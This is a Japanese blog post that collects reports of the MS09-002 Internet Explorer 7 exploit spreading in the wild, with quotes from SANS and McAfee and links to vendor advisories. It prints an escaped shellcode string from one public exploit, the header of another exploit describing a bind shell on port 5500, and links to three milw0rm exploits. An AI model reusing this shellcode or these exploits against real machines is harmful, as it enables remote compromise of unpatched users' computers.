MS09-002 exploit in the wild:SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc(情報元のブックマーク数)
MS09-002のExploitが出たよ!!!(IEもアップデートしないと危険だよ!って記事があった。
Several AV vendors reported about MS09-002 exploits in the wild. We can confirm this the exploit for the CVE-2009-0075 vulnerability (Uninitialized Memory Corruption) in Internet Explorer 7 is definitely in the wild and working as charm on an unpatched Windows XP machine.
InfoSec Handlers Diary Blog - MS09-002 exploit in the wild
マルウエアとしてもばらまかれているみたい。ただ、Base64でエンコードされているだけで、容易に検知できるとの事。
Malware authors are always working to create new and improved ways to evade detection and control compromised machines. This time, malware authors introduced obfuscation (base64 encoding) possibly to evade easy analysis and detection.
McAfee Threat Center – Latest Cyberthreats | McAfee
The ActiveX control facilitates connection to the malicious website to launch and execute the MS09-002 exploit.
MS09-002のExploitが出ています
var c=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee
http://www.milw0rm.com/exploits/8082
%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b
%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0
%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e
%u6578%u4100");
2つ目、Shellポートを開きますねぇ。Encoderが日本人?!>ShikataGaNai
###############################################################################
http://www.milw0rm.com/exploits/8080
# MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) #
###############################################################################
# #
# Thanks to str0ke for finding this in the wild. #
# #
# Tested on Windows 2003 SP2 R2 #
# #
# Written by SecureState R&D Team (ReL1K) #
# http://www.securestate.com #
# #
# win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind #
# #
###############################################################################
3つも出ていますねぇ。
http://www.milw0rm.com/exploits/8079
関連URL
- 最新パッチの脆弱性を悪用:IEの脆弱性を突く攻撃発生 - ITmedia エンタープライズ
- Another Exploit Targets IE7 Bug | TrendLabs | Malware Blog - by Trend Micro
- Internet Explorer 7の脆弱性(MS09-002)への攻撃を確認(HTML_DLOADER.AS) | トレンドマイクロ セキュリティ ブログ (ウイルス解析担当者による Trend Micro Security Blog)
- Exploit Shield protects against new IE7 vulnerability - F-Secure Weblog : News from the Lab
- IE7 exploit in the wild
- IEの脆弱性を突く攻撃が「予想通り」出現、日本国内でも確認:ニュース
- MS09-002 exploit in the wild
- SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc
- MS09-002 Exploit in the Wild - PandaLabs